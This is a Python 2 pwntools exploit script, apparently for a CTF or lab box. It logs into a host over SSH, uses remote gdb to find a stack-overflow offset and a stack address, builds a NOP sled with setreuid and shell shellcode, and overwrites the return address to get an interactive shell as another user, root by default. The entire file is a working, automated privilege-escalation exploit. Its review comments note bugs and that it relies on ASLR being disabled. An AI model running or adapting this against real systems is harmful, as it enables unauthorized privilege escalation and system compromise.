#!/usr/bin/env python2

import argparse
from pwn import *

####################################
###CONFIG###
####################################

# Command-line interface.  Options and positionals are declared in the same
# order as before so that argument binding (HOST, EXECUTABLE, TARGET) and the
# --help listing are unchanged.
parser = argparse.ArgumentParser(description='H4x yourself a Gibson.')
add = parser.add_argument
add('--nops', type=int, nargs='?', default=100,
    help='the number of nops with which to pad the shellcode')
add('--cyclic-length', type=int, nargs='?', default=512,
    help='the number of cycles to generate when autodetecting buffer size')
add('-gdb-command', type=str, nargs='?', default='gdb',
    help='the command which runs gdb on the TARGET machine')
add('-t', '--target-user', type=str, nargs='?', default='root',
    help='the user who is to be emulated with setreuid')
add('-p', '--password', type=str, nargs='?', default='',
    help='the password with which to ssh into the server')
add('host', metavar='HOST', type=str, nargs=1,
    help='the host to which to connect via ssh. FORMAT: username@host:port')
add('executable', metavar='EXECUTABLE', type=str, nargs=1,
    help='the executable to exploit')
add('-a', '--args', type=str, nargs='?', default='',
    help='optional arguments to pass to the provided executable')
add('target_function', metavar='TARGET', type=str, nargs=1,
    help='the function call which is to be targeted for exploitation')

args = parser.parse_args()

# Connection config -- HOST must look like username@host:port.  Anything that
# does not split cleanly (no '@', no ':', non-numeric port) prints the usage
# text and exits with status 5.
# NOTE(review): the ssh password is taken from the command line, so it is
# visible in process listings and shell history on the machine running this.
try:
    user, endpoint = args.host[0].split('@')[:2]
    host, port_text = endpoint.split(':')[:2]
    port = int(port_text)
    password = args.password
except (IndexError, ValueError):
    parser.print_help()
    sys.exit(5)

# Exploit config
binary = args.executable[0]
# NOTE: the default '' splits to [''], so execargs is never an empty list.
execargs = args.args.split(' ')
vuln_func = args.target_function[0]
target_user = args.target_user

# GDB config
gdb_path = args.gdb_command
cyclic_length = args.cyclic_length

# Shellcode config
num_nops = args.nops

# Context config: 64-bit Linux target for asm()/shellcraft/pack helpers.
context.update(arch='amd64', os='linux')

####################################
###Functions###
####################################
def gdb_get_attributes(gdb_proc):
    """Drive an interactive gdb session to collect what the payload needs.

    ``gdb_proc`` is a pwntools tube already attached to a gdb that was
    started on the target binary; ``execargs`` and ``vuln_func`` are the
    module-level config values.  Every command is followed by
    ``recvuntil('(gdb)')`` so the exchange stays in lock-step with the prompt.

    Returns ``{'buf_size': ..., 'stack_pointer': ...}`` as computed by
    get_vuln_buffer_size and get_vuln_stack_pointer, called in that order
    (the second appears to rely on the session state left by the first).
    """
    gdb_proc.recvuntil('(gdb)')
    # NOTE(review): this test is always true -- ''.split(' ') is [''], so even
    # the default --args yields a one-element list and 'set args ' is sent.
    if (len(execargs) != 0):   
        gdb_proc.sendline('set args ' + ' '.join(execargs))
        gdb_proc.recvuntil('(gdb)')
    # Drop the terminal-size variables from the debuggee's environment,
    # presumably so its environment (and hence its stack layout) matches a
    # run outside gdb -- TODO confirm against the target.
    gdb_proc.sendline('unset env LINES')
    gdb_proc.recvuntil('(gdb)')
    gdb_proc.sendline('unset env COLUMNS')
    gdb_proc.recvuntil('(gdb)')
    # 'break *' form: TARGET is interpreted as an address expression.
    gdb_proc.sendline('break * ' + vuln_func)
    gdb_proc.recvuntil('(gdb)')

    buf_size = get_vuln_buffer_size(gdb_proc)
    stack_pointer = get_vuln_stack_pointer(gdb_proc)

    return {'buf_size' : buf_size, 'stack_pointer' : stack_pointer}

def get_vuln_buffer_size(gdb_proc):
    """Measure how far into the input the 8 bytes found at ``$rbp`` appear.

    Runs the binary under gdb, steps over the targeted call with ``nexti``,
    answers the program's password prompt with a metasploit-style cyclic
    pattern of ``cyclic_length`` bytes, then reads the two words at ``$rbp``
    once gdb regains control and locates them within the pattern.
    Presumably those 8 bytes are the overwritten saved frame pointer of the
    current frame -- TODO confirm on the target binary.

    Returns that pattern offset plus 8.  The main section pads the payload to
    this length and appends p64(entry_point) right after it, so the extra 8
    bytes step over the 8 bytes that were found at rbp.
    """
    print('Building cyclic pattern to calculate shellcode injection length.')  
    # Metasploit pattern_create-compatible pattern: each 4-byte window is
    # unique, which is what the 32-bit lookup below relies on.
    pattern = cyclic_metasploit(cyclic_length)
    gdb_proc.sendline('run')
    gdb_proc.recvuntil('(gdb)')
    # Presumably stopped at the breakpoint on the targeted call; nexti steps
    # over the whole call, so the callee runs until it reads input.
    gdb_proc.sendline('nexti')
    gdb_proc.recvuntil('Enter the administrator password:')
    gdb_proc.sendline(pattern)
    # Wait for gdb to regain control; nothing here checks *why* it stopped.
    gdb_proc.recvuntil('(gdb)')
    # 'x/2x' examines two units in hex; gdb's default unit for 'x' is a
    # 4-byte word, hence the 32-bit packing below -- assumes no earlier x/
    # command changed the default size.
    gdb_proc.sendline('x/2x $rbp')
    rbp_pattern = gdb_proc.recvuntil('(gdb)')
    print(rbp_pattern)
    # First output line is '<addr>:\t<word>\t<word>'; skip the address label
    # and parse the hex words (base 0 accepts the 0x prefix).
    words = [int(w, 0) for w in rbp_pattern.split('\n')[0].split('\t')[1:]]
    # Re-serialise the words as they sit in memory (32-bit, little-endian) to
    # recover the exact 8 pattern bytes that landed at rbp.
    chars = ''.join([pack(w, 32, 'little', True) for w in words])
    print('Found pattern ' + chars + ' in rbp.')
    # Position of those bytes within the pattern == input bytes written before
    # the slot they ended up in.
    size = cyclic_metasploit_find(chars)
    print('Detected a buffer size of ' + hex(size) + ' bytes.')
    # Skip the 8 bytes at rbp so the caller's appended address lands in the
    # following slot.
    offset = size + 0x8
    print('Final offset is ' + hex(offset) + ' bytes.')
    return offset

def get_vuln_stack_pointer(gdb_proc):
    """Restart the binary under gdb and read ``$rsp`` at the first stop.

    Expects the breakpoint set by gdb_get_attributes to be in place and a
    previous run to still be live, so that 'run' makes gdb ask for restart
    confirmation (answered with 'y' below).

    Returns the stack pointer as an int.  The main section adds half the NOP
    count to it to aim the overwritten return address into the sled, so the
    value is only useful if the standalone run sees the same stack address;
    gdb disables address randomisation for its debuggee by default, while the
    later run outside gdb does not, so this presumes ASLR is already off on
    the target -- exactly the mitigation that defeats this approach.
    """
    print('Detecting stack pointer.')
    gdb_proc.sendline('run')
    # Answer gdb's "Start it from the beginning? (y or n)" confirmation.  It
    # is sent blind, without waiting for the question -- presumably the
    # confirmation is always asked at this point; TODO confirm.
    gdb_proc.sendline('y')
    gdb_proc.recvuntil('(gdb)')
    gdb_proc.sendline('x $rsp')
    # Output is '<addr>:\t<value>'; take the address label from the first tab
    # field, strip its trailing ':' and parse with base 0 (0x prefix).
    rsp_addr = int(gdb_proc.recvuntil('(gdb)').split('\n')[0].split('\t')[0][:-1], 0)
    print('Stack pointer found at address ' + hex(rsp_addr) + '.')
    return rsp_addr

####################################
###Main###
####################################
# All remote interaction below (gdb, /etc/passwd, the target binary) goes
# through this single pwntools ssh session.
conn = ssh(user=user, password=password, host=host, port=port)

print('''
--------------------------------------
STAGE 1: BEGINNING EXPLOIT AUTOCONFIGURATION
--------------------------------------
''')

# Grab information from debugging the vuln binary: run gdb on the remote host
# against the target and harvest buffer size / stack pointer.
gdb_proc = conn.process(argv=[gdb_path, binary])
attributes = gdb_get_attributes(gdb_proc)
gdb_proc.close()

# Grab information from the filesystem: resolve target_user to its numeric
# uid from the remote /etc/passwd (third ':'-separated field).  uid stays 0
# if the name is not found.
print('Attempting to grab user id for target user \'' + target_user + '\'.')
etc_passwd = conn.download_data('/etc/passwd').split('\n')
uid = 0
# NOTE(review): the loop variable reuses the module-level name `user` (the
# ssh login).  Nothing after this point reads `user`, so it is harmless, but
# confusing.  Also note that `uid` is only echoed below; the setreuid
# shellcode in Stage 2 uses the literal 1002.
for user in etc_passwd:
    data = user.split(':')
    if (data[0] == target_user):
        uid = int(data[2])
        break
print('Using UID ' + str(uid) + '.')

print('''
--------------------------------------
EXPLOIT AUTOCONFIGURATION COMPLETE
--------------------------------------
''')

print('''--------------------------------------
STAGE 2: GENERATING SHELLCODE
--------------------------------------
''')

# Python 2 str used as a byte buffer (context.arch selects amd64 encoding).
shellcode = ''
# setreuid to the hard-coded uid 1002 (not the value looked up above), then
# spawn a shell.
shellcode += asm(shellcraft.setreuid(1002))
shellcode += asm(shellcraft.sh())
print(disasm(shellcode))
# Prepend the NOP sled ...
shellcode = (asm('nop') * num_nops) + shellcode
# ... then pad with NOPs up to the measured buffer size.  At least 8 NOPs are
# always appended, so if sled + payload already exceed buf_size the return
# address below is placed beyond the measured offset.
shellcode += asm('nop') * max((attributes['buf_size'] - len(shellcode)), 0x8)

print('\nPadded shellcode length: ' + hex(len(shellcode)) + ' bytes.')

# Aim into the middle of the NOP sled using the $rsp sampled under gdb.  This
# only lands if the standalone run below sees the same stack address, i.e.
# the target has no effective ASLR -- the usual reason such payloads fail on
# hardened hosts.
entry_point = attributes['stack_pointer'] + (num_nops // 2)
print('Guessed entry point: ' + hex(entry_point) + '\n')
# 64-bit little-endian return address, appended right after the padding.
shellcode += p64(entry_point)

print(hexdump(shellcode))

print('''
--------------------------------------
SHELLCODE GENERATION COMPLETE
--------------------------------------
''')

print('''--------------------------------------
STAGE 3: ATTEMPTING EXPLOIT
--------------------------------------
''')

# NOTE(review): with the default --args, execargs is [''] (''.split(' ')),
# so an empty-string argv entry is passed to the binary.
vuln_proc = conn.process(argv=[binary] + execargs)
# Feed the payload as the program's input, then expect a shell prompt.  If no
# shell appears, recvuntil('$ ') blocks until the tube times out or closes --
# there is no failure path for a missed exploit.
vuln_proc.sendline(shellcode)
vuln_proc.recvuntil('$ ')
# Check which user the shell runs as; only the first line before the next
# prompt is compared.
vuln_proc.sendline('whoami')
whoami_result = vuln_proc.recvuntil('$ ').split('\n')[0]
if (whoami_result == target_user):
    print('You got the shell :D')
    vuln_proc.sendline('cd /home/' + target_user)
else:
    print('Something went wrong. You got the shell, but are the wrong user D:')
# Hand the shell to the operator.  The prompt starts with backspace/space
# sequences, presumably to erase the '$ ' already echoed by the remote shell
# -- confirm in a terminal.
vuln_proc.interactive(prompt = pwnlib.term.text.bold_red('\x08 \x08\x08 \x08' + whoami_result + '@' + host) + ':# ')